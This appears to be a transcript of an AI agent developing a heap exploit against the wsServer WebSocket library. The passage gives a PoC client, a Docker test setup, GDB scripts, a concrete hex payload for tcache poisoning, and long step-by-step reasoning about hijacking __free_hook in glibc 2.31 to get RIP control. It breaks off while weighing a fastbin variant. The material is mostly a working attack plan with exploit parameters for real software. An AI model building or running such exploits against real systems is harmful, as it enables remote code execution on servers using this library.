if (tc_idx < mp_.tcache_bins && tcache && tcache->counts[tc_idx] < mp_.tcache_count) {
tcache_put(p, tc_idx);
return; // never reaches the corrupted next-chunk check
}So we need to corrupt a chunk that is already in a tcache bin, not the top chunk.
The key insight from the recon: we need a free tcache chunk physically adjacent to the overflow buffer. The plan:
base64_encode does malloc(29) → request2size(29) = 48 → same tcache bin (index 1)malloc(48) for msg → chunk A (from top)malloc(48) for echo response → chunk S1 (from top, adjacent to A)free(S1) → tcache[1]: S1 (count=1)free(A) → tcache[1]: A → S1 (count=2)malloc(48) drains A from tcache[1]. tcache[1] = S1 (count=1). The exploit buffer IS chunk A, and S1 (free, in tcache) is physically adjacent at A+48.msg[24]. Layout relative to msg:
__free_hookmalloc(29) → 48-byte chunk → drains A from tcache. Then free(accept) puts A back. Sending 3 messages on connection 2: the 3rd malloc(48) returns &__free_hook. The echo response writes frame data there, setting __free_hook to a partially-controlled value. Then free(response) calls __free_hook → RIP jumps to that value.__free_hook Value LimitationThe echo response frame header (bytes 0x82, 0x18) is fixed, corrupting the lowest 2 bytes of __free_hook. For the PoC, this is fine — any unmapped address proves RIP control. The frame header bytes are: response[0] = 0x82 (FIN=1, opcode=2), response[1] = 0x18 (length=24).
next_byte() which buffers up to MESSAGE_LENGTH=2048 bytes from socketread_single_frame BEFORE validate_utf8_txt is called, so no UTF-8 validation on overflow dataws_connection structs are in static client_socks array (BSS), NOT on heap — can't overflow into themws_getaddress() returns a pointer to client->ip (static buffer), does NOT strdup — no malloc in echo's oncloseclose_client() only closes socket + destroys mutexes — no mallocprintf in onopen may initialize stdout buffer once (large allocation, ~8192 bytes)calloc(61) → 64-byte, base64_encode → malloc(29) → 48-byte, malloc(130) → 144-byte, then freesws_file() at ws.c:2078 references cli_events which doesn't exist — leftover from a refactoring.
AGENTS.md at repo root — compact instruction file for future agent sessionstests/Dockerfile.poc — Ubuntu 20.04 image, builds echo server with all protections disabled using direct gcc invocations (avoids Makefile's -O2 override)tests/poc_rip_control.c — Full PoC client with:
-2 flag): overflow on conn 1, trigger on conn 2-std=c99 -Wall -Wextratests/poc_gdb.txt — GDB script with breakpoints at vulnerable code, shows libc addresses, heap inspection at each phasetests/poc_run.sh — Orchestration script with interactive and auto modesws-poc)free() goes to tcache without checking corrupted next chunkThe critical next step is to retune the PoC for 48-byte chunks to poison tcache[1]:
Update the PoC command to use -n 1 -s 24 -f 24 -l 40 with a custom hex payload:
-o 00000000000000000000000000000000310048def9f7ff7f0000
This sets S1's prev_size=0, size=0x31 (48|PREV_INUSE), fd=__free_hook (0x7ffff7f9de48 LE)
Update the two-connection mode in poc_rip_control.c to send 3 messages on connection 2 (not just 1), because it takes 3 malloc(48) calls to drain tcache[1] → S1 → __free_hook:
__free_hookmalloc(48) returns __free_hook, echo writes frame data to it, then free(response) calls __free_hook → SIGSEGV with controlled RIPRebuild Docker image with updated GDB script (fix start vs run issue)
Run the tuned PoC and verify in GDB that:
__free_hookmalloc(48) on connection 2 returns __free_hookfree(response) triggers __free_hook → RIP = controlled valueDemonstrate RIP = 0x????????001882 (or similar) under GDB, proving RIP control
AGENTS.md — repo instruction file (completed)tests/Dockerfile.poc — Docker build environment (completed, needs rebuild with updated GDB script)tests/poc_rip_control.c — PoC client (completed, needs update: two-connection mode should send 3 messages instead of 1)tests/poc_gdb.txt — GDB helper script (completed, working with start command)tests/poc_run.sh — orchestration script (completed)src/ws.c — the vulnerable file, especially:
read_single_frame): the vulnerable integer overflowframe_state_data struct): field offsets (msg_data at 0, frame_length at 40, frame_size at 48, opcode at 64)ws_frame_data struct): huge struct with frm[2048] buffer, frame_size at large offsetnext_complete_frame): frame dispatch loop, error path at line 1713 does free(fsd.msg_data)ws_establishconnection): main connection loop, calls onclose after errorws_sendframe_internal): response allocation at line 636: malloc(header + length + 1)next_byte): reads from socket into 2048-byte bufferclose_client): no malloc/freews_getaddress): returns static buffer, NO strdupws_connection struct): static array, not on heapinclude/ws.h — constants: MAX_FRAME_LENGTH=16MB, MESSAGE_LENGTH=2048, MAX_CLIENTS=8, WS_FIN=128, WS_FR_OP_CONT=0, WS_FR_OP_TXT=1, WS_FR_OP_BIN=2examples/echo/echo.c — target server binary, onclose has no malloc, onmessage calls ws_sendframe_bcastsrc/handshake.c — handshake allocations: calloc(61) → 64-byte, base64_encode → malloc(29) → 48-byte, malloc(130) → 144-byteMakefile — build system, CFLAGS uses += (can't easily override -O2), hence direct gcc invocation in DockerfileOk so we got the corruption working. Plan the control of RIP.
Let me re-examine the current state of the code and the heap layout to plan the RIP control precisely.
Now let me re-read the key vulnerable code and the echo server to understand the exact allocation/free patterns:
Now let me look at the error path and the connection lifecycle to understand exactly when free(msg_data) happens and what happens after:
Let me look at the handshake flow and the base64_encode allocation:
Now let me look at the do_handshake function to understand all allocations during connection setup:
Now I have a thorough understanding of the codebase. Let me now reason through the exploit strategy carefully.
Let me check the handshake allocation sizes more carefully:
The handshake get_handshake_accept does:
calloc(1, sizeof(char) * (WS_KEY_LEN + WS_MS_LEN + 1)) = calloc(1, 61) → chunk size = 64base64_encode(hash, SHA1HashSize, NULL) → SHA1HashSize=20 → olen = 20*4/3+4 = 30, + 30/72=0, +1 = 31 → malloc(31) → chunk size = 48 (tcache bin idx 1)free(str) → frees the 64-byte chunkaccept (the 48-byte chunk)Then get_handshake_response:
5. malloc(sizeof(char) * WS_HS_ACCLEN) = malloc(130) → chunk size = 144
6. free(accept) → frees the 48-byte chunk
Then do_handshake:
7. free(response) → frees the 144-byte chunk
So per handshake: allocates 64, 48, 144, then frees 64, 48, 144 (in that order).
Now for the echo path (onmessage → ws_sendframe_bcast → ws_sendframe_internal):
malloc(2 + 24 + 1) = malloc(27) → request2size(27) = 32 → tcache bin idx 0 (for 32-byte chunks)free(response) → frees the 32-byte chunkWait, for a 24-byte payload the response is malloc(idx_first_rData + length + 1) = malloc(2 + 24 + 1) = malloc(27). request2size(27) = (27 + 16 + 15) & ~15 = 48. Actually let me recalculate:
MINSIZE = 32 (for 64-bit), request2size(27) = (27 + 8 + 15) & ~15 = 50 & ~15 = 48. Wait no.REQUEST2SIZE(req) = (req + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASKrequest2size(27) = (27 + 8 + 15) & ~15 = 50 & ~15 = 48. Hmm that's a 48-byte chunk.(48 / 16) - 1 = 2. Wait...(chunk_size - MINSIZE) / MALLOC_ALIGNMENT = (chunk_size / 16) - 1Wait, let me recalculate properly. On glibc 2.31 x86_64:
csize2tidx(x) = (x - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENTFor 32: (32 - 32 + 15) / 16 = 15/16 = 0 → idx 0
For 48: (48 - 32 + 15) / 16 = 31/16 = 1 → idx 1
For 64: (64 - 32 + 15) / 16 = 47/16 = 2 → idx 2
So:
malloc(31) → chunk 32 → tcache idx 0calloc(61) → chunk 64 → tcache idx 2malloc(130) → chunk 144 → tcache idx 7malloc(27) → chunk 32 → tcache idx 0 (same as handshake base64!)So if we use 24-byte messages for shaping, the echo allocates 32-byte chunks (tcache idx 0), same bin as the handshake base64 allocation.
But the exploit frame 1 also needs to be a specific size. The msg allocation in read_single_frame is realloc(msg, *msg_idx + fsd->frame_length + fsd->is_fin). For frame 1 (non-FIN), *msg_idx = 0, fsd->is_fin = 0, so realloc(NULL, frame_length) = malloc(frame_length). If frame_length = 24, then malloc(24) → chunk 32 → tcache idx 0. Same bin.
Now, the key question is: can we get a free chunk from the handshake adjacent to our exploit buffer?
Let me think about this differently. The shaping phase happens on connection 1 after the handshake. The handshake on connection 1 allocates and frees: 64, 32, 144. After free(accept) (the 32-byte base64 chunk), tcache[0] has 1 entry. After free(str) (the 64-byte chunk), tcache[2] has 1 entry.
Then the first echo message (shaping): malloc(24) → gets the freed base64 chunk from tcache[0]. Echo sends: malloc(27) → gets a new chunk from top. Echo frees: free(response) (32-byte, into tcache[0]). Then free(msg) (32-byte, into tcache[0]).
So after 1 shaping message:
After 2 shaping messages:
Wait, let me trace more carefully.
After handshake frees on connection 1:
free(accept) where accept was malloc(31) → chunk 32. tcache[0] = {accept}, count=1free(response) where response was malloc(130) → chunk 144. tcache[7] = {response}, count=1free(str) happens first in get_handshake_accept before free(accept), and free(accept) happens in get_handshake_response, and free(response) happens in do_handshake.Actually let me re-read the order:
In get_handshake_accept:
calloc(1, 61) → str (64-byte chunk)base64_encode(hash, 20, NULL) → malloc(31) → accept (32-byte chunk)free(str) → tcache[2] = {str}, count=1In get_handshake_response:
5. malloc(130) → response (144-byte chunk)
6. free(accept) → tcache[0] = {accept}, count=1
7. return response
In do_handshake:
8. SEND response
9. onopen callback
10. free(response) → tcache[7] = {response}, count=1
So after handshake:
Now, shaping message 1 (24-byte binary):
read_single_frame: malloc(24) → chunk 32. Gets accept from tcache[0]. tcache[0] empty.onmessage → ws_sendframe_internal → malloc(27) → chunk 32. Comes from top.free(response) → tcache[0] = {response_echo1}, count=1free(wfd.msg) → free(msg) → tcache[0] = {msg1 → response_echo1}, count=2So msg1 is at the same address as the original accept chunk, and response_echo1 is adjacent (from top). Actually no - response_echo1 comes from top, which is a different location than accept was.
Hmm. The problem is that we don't know the physical layout. Let me think about this from a higher level.
Actually, the key insight from the previous session's GDB run was:
The way to achieve this is to have the overflow buffer and an echo response allocated consecutively from top. Then when the echo response is freed, it goes to tcache, and the overflow can corrupt its fd pointer.
But wait - in the current flow, the overflow happens DURING read_single_frame, before the echo response is sent. So the echo response for the exploit message hasn't been allocated yet.
Let me reconsider. The exploit is:
malloc(24) → chunk A (from top or tcache)After step 1, the only adjacent thing is whatever comes next from top (which would be the top chunk itself). There's no freed chunk adjacent to A.
Unless... we can pre-shape the heap so that a freed chunk IS adjacent to where A will be allocated.
Strategy:
malloc(24) gets a specific chunk, and the physically next chunk is free in tcacheLet me think about this with concrete steps:
Step 1: Shaping on connection 1
malloc(24) from tcache/top, malloc(27) from top, free(27) to tcache[0], free(24) to tcache[0]Hmm, this is getting complicated. Let me think about what the GDB run showed us.
From the previous session's recon: the overflow was confirmed working - 128 bytes written past the buffer. The server survived because free() went to tcache. The next chunk was the top chunk.
The revised strategy from the summary was to use 48-byte chunks because the handshake's base64_encode does malloc(29) → 48-byte chunk, same tcache bin.
Wait, let me recalculate. base64_encode with SHA1HashSize=20:
olen = 20*4/3 + 4 = 30olen += 30/72 = 0 → still 30olen++ = 31 (nul termination)malloc(31) → request2size(31) = (31+8+15)&~15 = 54&~15 = 48So malloc(31) → 48-byte chunk. tcache idx = (48-32+15)/16 = 1.
Now, if we make our shaping messages use a payload size that results in malloc(X) → 48-byte chunk too:
malloc(X) → 48-byte chunk. Need request2size(X) = 48. So X can be 25-40 (since (40+8+15)&~15=48, (25+8+15)&~15=48). Actually: (25+8+15)=48&~15=48, (24+8+15)=47&~15=32. So X must be 25-40.malloc(2 + X + 1) = malloc(X+3). For this to be 48-byte chunk: need (X+3+8+15)&~15=48, so X+3 must be 25-40, meaning X = 22-37.Let's use X = 32 for simplicity.
Now the plan:
Connection 1:
malloc(32) → gets accept_base64 from tcache[1]. tcache[1] empty.malloc(35) → from top. Call this chunk R1 (physically after accept_base64? No, accept_base64 is from the handshake which was earlier...)Hmm wait. The accept_base64 chunk was allocated during the handshake, which allocated: str (64), accept_base64 (48), response (144). They were allocated from top in order. Then str was freed (64-byte → tcache[2]), then accept was freed... no wait.
Let me re-trace the handshake allocation order:
calloc(1, 61) → str, chunk at top, 64 bytes → chunk_strbase64_encode → malloc(31) → accept, chunk at top+64, 48 bytes → chunk_acceptfree(str) → chunk_str freed to tcache[2]malloc(130) → response, chunk at top+64+48, 144 bytes → chunk_responsefree(accept) → chunk_accept freed to tcache[1]free(response) → chunk_response freed to tcache[7]After handshake:
Now shaping message 1 (32 bytes):
malloc(32) → tcache[1] has chunk_accept → msg = chunk_accept. tcache[1] empty.malloc(35) → need 48-byte chunk. tcache[1] empty → from top. chunk_echo1 at top (after chunk_response).free(response_echo) → tcache[1] = {chunk_echo1}free(msg) → tcache[1] = {chunk_accept → chunk_echo1}, count=2Now the heap is: [freed chunk_str (64)] [freed chunk_accept (48)] [freed chunk_response (144)] [freed chunk_echo1 (48)] [top]
And tcache[1] = {chunk_accept → chunk_echo1}, count=2.
Now exploit:
malloc(32) → tcache[1] pops chunk_accept. tcache[1] = {chunk_echo1}, count=1.
Wait, that's the wrong bin! chunk_response is a 144-byte chunk in tcache[7], not tcache[1].
OK, so the physically adjacent chunk to chunk_accept is chunk_response (144 bytes). But that's in a different tcache bin. If we corrupt its fd, we'd need a 144-byte malloc to drain it, not a 48-byte malloc.
Hmm. Let me reconsider. I need the physically adjacent chunk to be:
Alternative approach: What if I don't use the handshake's freed chunks? What if I just send enough shaping messages so that two consecutive chunks from top end up in the right tcache bin?
After the handshake, the heap looks like:
[chunk_str freed (64)] [chunk_accept freed (48)] [chunk_response freed (144)] [top]
If I send shaping messages of size 32:
Shaping msg 1:
malloc(32) → chunk_accept from tcache[1]malloc(35) → from top: chunk_E1 (48 bytes)free(echo1) → tcache[1] = {chunk_E1}free(msg1) → tcache[1] = {chunk_accept → chunk_E1}, count=2Shaping msg 2:
malloc(32) → chunk_accept from tcache[1]. tcache[1] = {chunk_E1}, count=1.malloc(35) → from top: chunk_E2 (48 bytes). Physically after chunk_E1!free(echo2) → tcache[1] = {chunk_E2 → chunk_E1}, count=2free(msg2) → tcache[1] = {chunk_accept → chunk_E2 → chunk_E1}, count=3Wait, chunk_accept was just written back to tcache[1]. And chunk_E1 and chunk_E2 are consecutive from top. After chunk_E2 comes the top chunk.
malloc(32) → chunk_accept from tcache[1]. tcache[1] = {chunk_E2 → chunk_E1}, count=2.malloc(35) → chunk_E1 from tcache[1]. tcache[1] = {chunk_E2}, count=1.free(echo3) → tcache[1] = {chunk_E1 → chunk_E2}, count=2. (chunk_E1 reused!)free(msg3) → tcache[1] = {chunk_accept → chunk_E1 → chunk_E2}, count=3Hmm, this is getting tangled. Let me think differently.
I need:
Then overflow from X corrupts the fd pointer of the free chunk at X+48.
To get this layout, I need two consecutive 48-byte chunks from top, then free the second one.
Method:
malloc(32) gets A from tcache[1]. tcache[1] = {B}, count=1.free(msg_data) frees A → tcache[1] = {A → __free_hook}, count=2.Then on connection 2:
malloc(31) → gets A from tcache[1]. tcache[1] = {__free_hook}, count=1.free(A) → tcache[1] = {A → __free_hook}, count=2.Wait, but during the handshake, base64 is allocated and then freed. So:
malloc(31) → gets A. tcache[1] = {__free_hook}.free(accept) → frees A. tcache[1] = {A → __free_hook}, count=2.Then later on connection 2, send a message:
malloc(32) → gets A from tcache[1]. tcache[1] = {__free_hook}, count=1.malloc(35) → gets __free_hook from tcache[1]!!! tcache[1] empty.free(response) where response = __free_hook → calls __free_hook(content) → RIP control!This is the plan! But we need to be careful about what value gets written to __free_hook.
The echo response is constructed in ws_sendframe_internal:
response = malloc(sizeof(unsigned char) * (idx_first_rData + length + 1));
...
response[0] = (WS_FIN | type); // 0x82 for binary
response[1] = length & 0x7F; // payload length (if <= 125)
...
for (i = 0; i < length; i++)
response[idx_response++] = msg[i];
response[idx_response] = '\0';So response[0] = 0x82, response[1] = payload_length. These overwrite the first 2 bytes of __free_hook.
Then free(response) is called with response pointing to __free_hook. If __free_hook is set to a value, free() will call that value with the response pointer as argument. But __free_hook hasn't been set yet! We're WRITING to __free_hook memory, not setting it as a function pointer.
Wait, I'm confusing things. The tcache poisoning makes malloc() return a pointer TO __free_hook (the variable in libc .bss). We then write our frame data TO that address. The frame data overwrites __free_hook's value.
So after the echo malloc(35) returns &__free_hook:
response = &__free_hookresponse[0] = 0x82 (overwrites byte 0 of __free_hook)response[1] = payload_len (overwrites byte 1)response[2..2+msg_len-1] = msg content (overwrites bytes 2+)So __free_hook's value becomes: the 8 bytes written starting at response[0].
For a 32-byte binary message:
__free_hook is at a fixed address. Its VALUE (which is a function pointer) gets overwritten with:
On little-endian x86_64, the function pointer value would be:
0x??????????20_0082 where ?????????? are our controlled bytes (from msg[0..5]).
For the PoC, we just need to show RIP control. Any crash at a controlled address is sufficient. So if we send a message with content like 0x4141414141414141..., __free_hook becomes 0x4141414141412082 (or similar).
But actually, we can be smarter. We need the response to be exactly sizeof(unsigned char) * (idx_first_rData + length + 1) bytes. For length <= 125, idx_first_rData = 2. So malloc(2 + length + 1). For this to be a 48-byte chunk: need request2size(2 + length + 1) = 48, so length + 3 must be 25-40, meaning length = 22-37.
If we use length=32: malloc(35) → 48-byte chunk → tcache[1]. Good.
Now, after the echo writes to __free_hook, __free_hook = some value we partially control. Then free(response) is called. Since __free_hook is now set, free() calls __free_hook(response), which is our_value(response).
For a pure PoC, we just need the crash at a controlled RIP. So __free_hook can be any invalid address.
But wait - there's a subtlety. The response variable in ws_sendframe_internal points to the address returned by malloc, which is &__free_hook. So free(response) = free(&__free_hook). And __free_hook is called with &__free_hook as argument. But by this time, __free_hook's VALUE has been overwritten by the frame header + content.
So: __free_hook(&__free_hook) where __free_hook = 0x??????????2082 (for 32-byte payload). RIP will be 0x??????????2082. This proves control.
But we CAN do better. If we use a payload size where the frame header doesn't corrupt the address too badly, or if we find a way to write a clean address...
Actually, the frame header is always 2 bytes (for length <= 125). So bytes 0-1 of __free_hook are always corrupted by the frame header. We can't avoid this for response sizes that use a 2-byte header.
But for the PoC, 0x??????????2082 is already RIP control! We just need to show the crash.
Wait, actually I should reconsider. The echo writes response content to response, which is &__free_hook. But response is a pointer to unsigned char. So:
response[0] = frame[0] = 0x82 → byte at &__free_hookresponse[1] = frame[1] = length → byte at &__free_hook + 1response[2..2+length-1] = msg[0..length-1] → bytes at &__free_hook + 2 onwardsOn x86_64 little-endian, __free_hook is an 8-byte function pointer. The value is loaded as:
So __free_hook = msg[5]<<56 | msg[4]<<48 | msg[3]<<40 | msg[2]<<32 | msg[1]<<24 | msg[0]<<16 | 0x2082
We control bytes 2-7 (msg[0..5]). For system at 0x7ffff7e01290, we'd need:
So we can't cleanly set __free_hook to system(). But for the PoC, we just need to prove RIP control. We can set msg[0..5] to something recognizable like \x41\x41\x41\x41\x41\x41 and show RIP = 0x4141414141412082.
Actually wait, I realize we should think about this more carefully. The critical path is:
After corrupting tcache[1] so that B.fd = &__free_hook:
base64_encode → malloc(31) → gets... hmm, which chunk?Actually, the tcache[1] state after the overflow on connection 1 depends on what exactly we overwrite. Let me reconsider.
After shaping and before exploit:
malloc(32) → gets A from tcache[1]. Wait, no. After shaping msg 2 frees, tcache[1] has {A, B, ...}. Let me re-trace.OK, I think the cleanest approach is:
Pre-conditions:
Exploit:
malloc(32) for exploit frame 1 → gets the most recently freed chunk (let's call it A). tcache[1] now has B at head.Wait, but tcache counts. When we popped A, count went from 2 to 1. B is still in tcache with count=1. After corrupting B's fd: tcache[1] = {B → __free_hook}, count=1.
free(msg_data) = free(A). A goes to tcache[1]: {A → B → __free_hook}, count=2.Wait, but A was the overflow buffer. After the overflow, the server hit the error path and called free(fsd.msg_data) at line 1713. That frees A. But A is still "valid" (it was allocated). So free(A) → tcache[1] = {A → B → __free_hook}, count=2.
Hmm, but after the overflow, next_byte() returns -1 (socket EOF), so read_single_frame returns -1, the loop breaks, and free(fsd.msg_data) is called at line 1713. That's free(A). Then the error propagates up, onclose is called, and the thread exits.
So after connection 1 closes:
But B's fd is corrupted. When the next malloc(31) pops A, tcache[1] = {B → __free_hook}, count=1. Then the next malloc(31) pops B, tcache[1] = {__free_hook}, count=0.
But wait, in the connection 2 handshake, base64_encode does malloc(31) which gets A. Then free(accept) = free(A) puts A back: tcache[1] = {A → __free_hook}, count=1.
Then in the connection 2 echo path:
malloc(32) → gets A from tcache[1]. tcache[1] = {__free_hook}, count=0.malloc(35) → gets __free_hook!!! Writes frame data there.free(response) → response = __free_hook pointer. Since __free_hook was overwritten, __free_hook(response) is called → RIP control!Wait, but there's a problem. The free(response) is called in ws_sendframe_internal. At that point, __free_hook has been overwritten by the echo's malloc returning its address and the subsequent write. But __free_hook was 0 (NULL) before. After the echo writes to it, it becomes the frame header + msg content.
Actually wait, free(response) is called at line 687. By this point, response points to __free_hook's memory location. The content of __free_hook has been overwritten. So when free(response) is called:
free() checks __free_hook__free_hook is now 0x??????????2082 (not NULL)free() calls __free_hook(response) = 0x??????????2082(&__free_hook)0x??????????2082 is not a valid function addressSIGSEGV! RIP = 0x??????????2082. RIP control proven!
Now, for an even better demo, we could try to set __free_hook to system() or exit() for a cleaner crash. But the frame header corrupts the low 2 bytes. So we'd need:
Actually, for the PoC, just crashing at a controlled address is enough. We can set msg[0..5] to recognizable bytes and demonstrate RIP = that value.
But actually, there might be a way to write a clean value. What if we use a message that triggers a 10-byte frame header (for 64-bit length)? Then the frame header is 10 bytes, overwriting all 8 bytes of __free_hook.
For a length >= 65536: idx_first_rData = 10, so response = malloc(10 + length + 1). For this to be a 48-byte chunk: request2size(10 + length + 1) = 48, so 10 + length + 1 must be 25-40, meaning length = 14-29. But length must be >= 65536 for 10-byte header. Contradiction!
So 10-byte header isn't possible for 48-byte chunks. The 2-byte header is what we get.
We could also consider a message with 4-byte header (16-bit length, 126-65535): idx_first_rData = 4, so malloc(4 + length + 1). For 48-byte chunk: length + 5 in 25-40, so length = 20-35. But length must be 126-65535 for 4-byte header. Contradiction again.
So with 48-byte chunks, we always get a 2-byte header that corrupts the low 2 bytes of __free_hook.
For the PoC, this is fine. Let me plan the implementation.
Now let me also think about whether free(msg_data) on connection 1's error path will cause issues. After the overflow, msg_data = A (the exploit buffer). The overflow wrote past A, corrupting B's metadata. When free(A) is called:
Actually, A is a 48-byte chunk. User data starts at A (which is chunk+16). User data is 32 bytes (48 - 16). The overflow starts at msg[f1sz] where f1sz=32. So the overflow starts right at the boundary of A's user data! The first byte of the overflow goes into the next chunk's prev_size.
So A's own chunk metadata (prev_size and size at A-16) is untouched. Only the adjacent chunks are corrupted. free(A) should work fine because:
Good. So the plan is solid.
Let me also think about whether the free(msg_data) at line 1713 actually happens before or after the tcache is poisoned. The sequence is:
next_byte() returns -1 (EOF from our closed socket).read_single_frame returns -1.free(fsd.msg_data) = free(A) → A goes to tcache[1].After step 6: tcache[1] = {A → B → __free_hook} (A was pushed to head, B was already there with corrupted fd, count goes to 2).
Wait, actually tcache[1] before step 6 was: {B → __free_hook}, count=1.
After free(A): tcache[1] = {A → B → __free_hook}, count=2.
But does tcache_put(A) check A's fd? No, it just sets A->next = tache->entries[1], then tcache->entries[1] = A. So A->next = B. And B->next was corrupted to __free_hook.
So the chain is: A → B → __free_hook. Correct!
Now for connection 2:
malloc(31) → gets A from tcache[1]. count=1.
tcache[1] = {B → __free_hook}free(accept) = free(A) → tcache_put. count=2.
tcache[1] = {A → B → __free_hook}Now send a message on connection 2:
malloc(32) → gets A from tcache[1]. count=1.
tcache[1] = {B → __free_hook}malloc(35) → gets B from tcache[1]. count=0.
tcache[1] = {__free_hook}Hmm wait, that's wrong. After getting B, tcache[1] should be {__free_hook}, count=0. But actually, count was 1 when we popped B, so it goes to 0. And the head becomes B->next = __free_hook.
Actually, tcache works like this:
// tcache_get
tcache->entries[tc_idx] = e->next; // head = B->next = __free_hook
--(tcache->counts[tc_idx]); // count = 0
return e; // returns BSo after getting B: tcache[1] = {__free_hook}, count=0. But the entry IS __free_hook, and count is 0. Can we still get it?
In glibc 2.31, tcache_get checks tc_idx < mp_.tcache_bins && tcache && tcache->entries[tc_idx] != NULL. It does NOT check counts! So even with count=0, if entries[tc_idx] is non-NULL, it will be returned.
Wait, actually I need to double-check. Let me look at the glibc 2.31 source:
static __always_inline void *
tcache_get (size_t tc_idx)
{
tcache_entry *e = tcache->entries[tc_idx];
assert (tc_idx < TCACHE_MAX_BINS);
assert (tcache->entries[tc_idx] > (void *) 0);
tcache->entries[tc_idx] = e->next;
--(tcache->counts[tc_idx]);
e->key = NULL;
return (void *) e;And in __libc_malloc:
if (tc_idx < mp_.tcache_bins
/*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
&& tcache
&& tcache->entries[tc_idx] != NULL)
{
return tcache_get (tc_idx);
}Yes! It only checks entries[tc_idx] != NULL, not counts. So even with count=0, if the entry pointer is non-NULL, it's returned. The count becomes -1 (underflow), but that's fine for exploitation.
So after getting B for the echo response:
Then, the echo response writes to B. B is a legitimate chunk, so that's fine. Then free(response) = free(B). This goes to tcache_put. tcache[1] = {B → __free_hook}, count=1.
Wait, but free(B) checks tcache->counts[tc_idx] < mp_.tcache_count (which is 7 by default). Count is 0, which is < 7, so tcache_put succeeds. tcache[1] = {B → __free_hook}, count=1.
Hmm, but we've made no progress. We got B back, not __free_hook.
I think the issue is that connection 2's echo is the FIRST malloc on that thread's connection. But connection 2 has its OWN thread, which means... does each thread have its own tcache?
On glibc 2.31, tcache is per-thread! Each thread has its own tcache_perthread_struct. So connection 2's thread has an EMPTY tcache[1]!
This is a critical issue. The tcache we poisoned is connection 1's thread tcache. Connection 2 runs in a different thread with its own tcache.
Wait, but is this actually true? Let me reconsider. The wsServer creates a new thread per connection (ws_establishconnection runs in a thread). So connection 1 and connection 2 are in different threads, each with their own tcache.
So tcache poisoning from connection 1's thread does NOT affect connection 2's thread's tcache. This is a major problem.
But wait, the chunks we freed are in the ARENA, not just tcache. When tcache is full (7 entries), further frees go to the arena's fastbins. But we're dealing with tcache, not fastbins.
Hmm, but there's only one main arena (well, one arena per thread, but they share the same heap). Actually, on glibc 2.31, threads can have their own arenas, and tcache is per-thread.
But our GDB run showed the chunk had the NON_MAIN_ARENA flag set, meaning it's in a thread arena. Each arena has its own locks and chunk management.
So the tcache poisoning approach has a fundamental problem: we're poisoning connection 1's thread tcache, but we need connection 2's thread to hit it.
Wait, let me reconsider. Are there ways around this?
But on connection 1, after the overflow, the server hits the error path and calls free(msg_data), then onclose, then the thread exits. No more mallocs.
Unless... we can make the server NOT error out after the overflow. But the overflow triggers because next_byte() returns -1 (we close the socket). If we DON'T close the socket, the write loop keeps going (writing our overflow data). After the write loop, the frame is complete (FIN=1), and next_complete_frame returns with the message. Then onmessage is called, which does ws_sendframe_bcast → malloc(response). That malloc would be on the SAME thread!
Wait, this is a much better approach! Let me re-read the write loop:
for (i = 0; i < fsd->frame_length; i++, (*msg_idx)++)
{
cur_byte = next_byte(wfd);
if (cur_byte == -1)
return (-1);
msg[*msg_idx] = cur_byte ^ masks[i % 4];
}The write loop reads one byte at a time via next_byte(). It writes fsd->frame_length bytes (which is huge, ~2^64). After writing our overflow bytes, it needs MORE bytes from the socket. If we close the socket, next_byte() returns -1, and the loop exits.
But what if we send exactly the right number of overflow bytes and then... we can't send 2^64 bytes. The loop will always hit EOF.
Unless we change the approach. What if we make the overflow length smaller? Instead of 2^64-11, what if we use a length that wraps to a small value but the actual overflow is just a few dozen bytes?
The current setup:
frame_size = f1sz + length = 5 (mod 2^64) → passes checkrealloc(msg, f1sz + length + 1) = realloc(msg, 6) → tiny, same pointerlength bytes starting at msg[f1sz]But length = 5 - f1sz = 5 - 16 = 0xFFFFFFFFFFFFFFF5 for f1sz=16. That's way too many bytes.
What if f1sz = 4 and length = 1? Then frame_size = 5, realloc(msg, 6), write loop writes 1 byte. No overflow.
The problem is that to overflow, we need length to be huge (wrapping around). And the write loop tries to read length bytes, which will always hit EOF.
So on a single connection, after the overflow, the server always errors out. The thread exits. No more mallocs on that thread.
OK so we're back to the cross-thread problem. Let me think about alternatives:
Alternative 1: Use the main arena's fastbins instead of tcache
Fastbins are per-arena, not per-thread (well, each thread has its own arena, but the main arena is shared). Actually no, fastbins are also per-arena.
Hmm, but on glibc 2.31, the first thread uses the main arena. Additional threads may use the main arena too (if it's not locked) or get their own arena.
Actually, the NON_MAIN_ARENA flag we saw suggests the chunk was in a thread arena. But if multiple connections share the same arena, then the fastbins are shared.
Let me think about this differently. In practice, for the PoC:
But actually, tcache takes priority over fastbins. When we free a chunk, it goes to the current thread's tcache first. When we malloc, the current thread's tcache is checked first. So even if the chunk is in a shared arena, the per-thread tcache intercepts it.
This means that for tcache poisoning to work cross-thread, we'd need to corrupt the other thread's tcache. But the other thread's tcache struct is in a different heap allocation.
Wait, what if we can overflow into ANOTHER thread's tcache_perthread_struct? That seems very unlikely with our fixed overflow pattern.
Alternative 2: Make the write loop succeed
What if instead of having the write loop hit EOF, we make it succeed by providing enough data? The frame length is huge, but next_byte() reads from a 2048-byte buffer. If we fill the buffer, the loop writes 2048 bytes, then next_byte() tries to read more from the socket.
But fsd->frame_length is ~2^64. We can't send that many bytes. The loop will hit EOF.
Unless... we modify the approach so that the write loop only overwrites a small number of bytes.
Wait, what about a different exploitation path? Instead of using the continuation frame integer overflow, what if we look at the error path more carefully?
Actually, let me reconsider the approach. What if we DON'T close connection 1 after the overflow? Instead:
next_byte() returns -1 → read_single_frame returns -1free(fsd.msg_data) at line 1713 → frees A → tcache[1] = {A → B_corrupted → __free_hook}next_complete_frame, returns -1ws_establishconnection calls onclose, then closes the connectionAll of this is on T1's thread. The poisoned tcache is T1's tcache. T1 exits, and its tcache is gone.
Hmm, but is the tcache_perthread_struct freed when the thread exits? Let me think... The tcache_perthread_struct is allocated via malloc() on thread creation (in __libc_malloc's tcache initialization). When the thread exits, the struct is NOT freed - it remains in the heap. But subsequent threads will create their OWN tcache structs.
So even though the poisoned chunks are in the heap, the new thread's tcache is fresh and won't see them.
Alternative 3: Use fastbins instead of tcache
If we fill up the tcache (7 entries) for the target bin, subsequent frees go to fastbins. Fastbins are part of the arena, not per-thread. If T1 and T2 share the same arena, then fastbin poisoning would work cross-thread.
But do T1 and T2 share the same arena? On glibc 2.31, by default, the main thread uses the main arena. Other threads may use the main arena or create their own. The number of arenas is limited (mp_.arena_max). For a simple program like our echo server with only 2 concurrent threads, they likely share the same arena.
